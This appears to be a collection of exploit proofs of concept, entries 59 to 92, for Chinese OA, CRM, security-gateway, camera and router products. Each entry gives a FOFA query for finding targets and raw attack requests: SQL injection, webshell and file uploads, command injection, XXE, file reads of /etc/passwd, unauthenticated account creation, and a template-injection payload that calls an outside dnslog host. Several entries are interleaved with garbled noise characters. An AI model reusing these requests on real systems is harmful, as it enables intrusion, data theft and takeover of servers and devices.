
59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Baizhuo (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Note: the sql parameter is base64; c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, so the statement is executed as-is and the result is returned as an Excel export. Log-based detection has to decode the parameter, because the SQL keywords never appear in clear text in the request line.

61. Zheda Enter (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the injected echo wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Check: time-based blind; the response should arrive about five seconds later than a request with a harmless sId.

65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456 / 123456 has been created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

" t5 D1 L$ W3 `# n66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入* g- p& c) b9 J2 V- a
FOFA:app="万户ezOFFICE协同管理平台", E& y& y! n  c/ o1 |/ Z

( {$ z7 B+ X3 ~' \GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
2 H  `. I. x. v6 z$ EHost: x.x.x.x
1 \6 H, Q- j4 QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
0 p8 A" ]7 o) L! OConnection: close
. P8 y; F( \3 P' s' L5 s' ]Accept: */*
6 A- ], ]: X+ x( yAccept-Language: en- K, G. o+ f8 g4 @
Accept-Encoding: gzip
9 Z7 P6 o! d& S, p/ H1 L6 P0 l7 g$ Y' j5 Z2 e8 d
/ l) u2 X' G0 O  Q
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
7 X, Q$ H: O  f& @* l% U
" v% Q& A& b+ p5 i9 x67. 万户ezOFFICE wpsservlet任意文件上传3 w! z/ P9 R& x1 o. v
FOFA:app="万户网络-ezOFFICE"
$ r: v$ x0 J- l1 H" k) N$ [# TnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
" \! J( S# m, @9 ~4 u% jPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
) }& L+ y9 p/ X( `1 d7 U/ g" G" XHost: x.x.x.x
9 P, X- A, V9 A+ o; P3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
3 ^- n" m7 x4 `( ~4 i* iContent-Length: 173! W: x7 Z2 U0 l& v6 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8( B/ _* r$ F' o
Accept-Encoding: gzip, deflate8 G# w. ]* Q! }# U/ X
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
3 u* j  o  j7 o6 Y/ [2 hConnection: close
7 A5 s" E' l& @. z. g) j: uContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
2 |4 K: k3 M/ q3 R7 d" bDNT: 11 S, T! T% L; h
Upgrade-Insecure-Requests: 1
8 o) @. |# m/ _0 m( Y) W5 h5 Q- e5 B! X2 P7 H0 j
--ufuadpxathqvxfqnuyuqaozvseiueerp
8 ?: K1 `/ p. z1 P5 N7 t4 cContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
! ?) H8 i( i  ?, H
! w% O4 f& g' \& P, }4 X; R0 W<% out.print("sasdfghjkj");%>2 A- s) I9 t  S/ w
--ufuadpxathqvxfqnuyuqaozvseiueerp--
4 H" a* `2 ]5 ]8 y3 N* A( d, U% Z/ O  _, i2 u

- ?1 \. ]: |0 K' z文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp$ J( ]9 t7 r( _8 _9 k

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

Note: the ;.js suffix on the path is there to slip past an authentication filter that exempts static resources; the servlet container still resolves the request to wf_printnum.jsp. Time-based blind, five-second delay.

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

Note: the SID header carries the command in base64; dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to type C:\Windows\win.ini, so a successful run returns the contents of win.ini. The __VIEWSTATE value is the (elided) deserialization payload that triggers execution.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

Note: xmlValue is a URL-encoded document whose DTD declares an external entity pointing at file:///c:/windows/win.ini and expands it inside the VALUE field; the file content comes back in the response.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

4 H$ E3 X" R' _7 f& L7 C" t, A75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! `+ f0 a6 X- G7 k0 m
FOFA:app="TELESQUARE-TLR-2005KSH"+ J- I3 d$ ?- M
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1* j- R: W. @0 |5 j. L+ t" T
Host: x.x.x.x/ G5 V" K, G, n1 _5 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 }( k( l  S; s; i3 V
Connection: close" _5 s+ S& b; G8 a9 S
Accept: */*
' |* L( i" J, y1 T: IAccept-Language: en7 u1 P; j7 C5 a1 j( @
Accept-Encoding: gzip
' d. @# P3 D7 l4 ~* L; w; E( _. T7 f2 Y# y* J

0 r" l  K) _3 F; x, ]: TGET /cgi-bin/test28256.txt HTTP/1.1" o- ?% M& @6 G" u
Host: x.x.x.x/ }5 `% B7 ?# X- {+ F
; M9 Q6 @! P& ]* n" ~% B

- b  t* n: u* F7 R. A7 l1 m" q76. 新开普掌上校园服务管理平台service.action远程命令执行( R3 g5 Y3 x" f$ {% x$ Q4 V3 i. M
FOFA:title="掌上校园服务管理平台"
, l1 P  ^6 j1 \& BPOST /service_transport/service.action HTTP/1.1
- T$ H  h. \* j+ F9 W0 P* IHost: x.x.x.x5 W7 b) ]* x& p, ^% ^/ {7 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; j3 C! E" ~: E& y8 H4 i5 Q+ q
Connection: close  s; ?: S1 c; @  U# Z7 b
Content-Length: 211, H) B* m6 \* }% o$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 s8 E  B. t. [! t
Accept-Encoding: gzip, deflate
5 u8 F2 j1 z- A) v" G* {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a9 J) x+ v8 A( q! _9 O) aCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
; z  H, j; O, K) l& }Upgrade-Insecure-Requests: 1& q$ ]8 e( p7 p
4 L' P% N) M. D2 q3 D
{
# ?1 o( I9 Y) m"command": "GetFZinfo",
- i# K; ~/ B" d* d  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
9 \8 \5 O6 z* j9 B; u  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 t9 R2 Y+ F! J
}8 v5 h- P% h" i3 \3 I$ B
3 y- B! D5 b5 U% N' _, u
1 P' u7 e6 l4 Z7 w$ v& c
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
% }) }9 \# k/ e$ H, ?; r1 |Host: x.x.x.x
, ?- V; G# C7 w; t& a; X: B4 z3 C. ^4 p6 A6 F/ i

. N4 w0 {1 s- {( @* u5 |) M0 _1 b' A( E5 k8 y  j# _
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传* f! Z9 L+ J9 y. @5 ]! E. `
FOFA:icon_hash="2001627082"  s; K' U) H& K( ^
POST /Platform/System/FileUpload.ashx HTTP/1.1
$ c! t( s+ x/ P6 F# T: O+ I& G8 _& @Host: x.x.x.x  v2 a" ^: _% p, Z3 y- J' u" p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! C8 o1 R% J9 I: u6 ^Connection: close  m5 f  q$ M% P" K
Content-Length: 336
) e& l- K! K2 P6 L9 r8 qAccept-Encoding: gzip% h7 x0 t# W, K% }! }
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 U* _! `* u  i! ]
" `+ @, ^% V3 O: e------YsOxWxSvj1KyZow1PTsh98fdu6l
/ v' I6 {* T; V) y  n% vContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"- F1 R- c& o7 k) \9 ^
Content-Type: image/png% V$ r0 p5 B5 M3 A' d
+ b1 i+ H: T9 Z' ~% ^/ k
YsOxWxSvj1KyZow1PTsh98fdu6l
1 c  |; V. h1 \9 t% H( Z/ u------YsOxWxSvj1KyZow1PTsh98fdu6l- f9 X. M& V  g2 T% Z
Content-Disposition: form-data; name="target"
( k9 `$ R3 d1 J8 h% g6 a
3 [7 p! i9 Z& {/ c/ G; h/Applications/SkillDevelopAndEHS/' ~8 z7 Z9 l  [" [' `
------YsOxWxSvj1KyZow1PTsh98fdu6l--
% A- B$ Y" R4 s6 F2 B% w
! d8 g, G! f. s$ v/ }2 a- G& i" p* L3 o0 J3 V, A2 Y1 ~6 `3 c
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
. g& @% B& _. |Host: x.x.x.x% u6 h% S7 j3 W- l

3 a2 y8 T# q  O5 i( Q5 L3 a+ T) Y- N, I/ N
79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao (速达天耀) software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then fetch the written JSP:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

Note: same FreeMarker ?new() / Execute primitive as entry 76, here reached through the sql field, which the report engine renders as a template before running it. Execute hands the string to Runtime.exec without a shell, so the backtick in the curl URL is not expanded; the DNS callback alone confirms execution.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla webshell:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

The shell is then reachable at http://x.x.x.x/userfiles/index.jsp

3 M" n; ?- P7 b8 d- N; x( w. R9 z3 D86. 日本tosei自助洗衣机RCE# p8 l6 p# c7 F2 T9 a- J' U% o) v
FOFA:body="tosei_login_check.php"1 P( D  b+ A) L8 ^9 u. Z
POST /cgi-bin/network_test.php HTTP/1.1# V' K& c* j/ y+ a7 d+ f8 i( u! M
Host: x.x.x.x
, |! H+ D( G; `) {7 c! F  gUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 H! e3 y" s1 O$ F8 @. TConnection: close1 A: Z8 d% ]# o. `1 T% l8 N, S9 H
Content-Length: 445 I: n" R1 `, l, V
Accept: */*
% N# o/ q6 U% ^0 s" B; ~8 ~( RAccept-Encoding: gzip' w5 Q" O  a  y
Accept-Language: en- K: B/ o" G3 I
Content-Type: application/x-www-form-urlencoded. @) c8 J( h7 N1 @

1 w. `/ a: l. [2 khost=%0acat${IFS}/etc/passwd%0a&command=ping( ?! ~/ W, n( O5 e3 M! @3 I

+ }2 g- B* L) f' m7 J
87. DBAPPSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The file lands at /jfhatuwe.php (the suffix parameter controls the final path, not the multipart filename).

88. DBAPPSecurity (安恒) MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

The type parameter decodes to a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php, so the dropped script is served at /txzfsrur.php and shows the marker string and phpinfo output.

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

Check: a response containing 24642 (111*222) confirms the injection. The .js%70 spelling is .jsp with the final letter percent-encoded, which defeats extension-based filters that do not decode the path before matching.

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

; G& Y8 O: E0 c' B; i91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
( b: R% M" r; n  M6 ~' d  P0 dFOFA:title="综合安防管理平台"4 i% `  ?3 U. B
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' t' N7 K2 b" J
Host: your-ip
0 M8 a0 @- K1 K5 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
% g0 {' @$ u9 `5 u1 |( \& PAccept-Encoding: gzip, deflate
0 x& r6 k8 j: tAccept: */*
: T0 @& w6 D1 w; O4 D7 \4 ZConnection: keep-alive
: o! ?8 G7 j9 f" N, _0 A
# Y3 _- l% J' a( W, d! O- p, H
' a# y  }( O& d6 L2 J- F; [+ f" h) Y/ Y3 |4 D- E4 Z5 G4 U
92. Hikvision (海康威视) operations management center session command execution
Fastjson deserialization command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

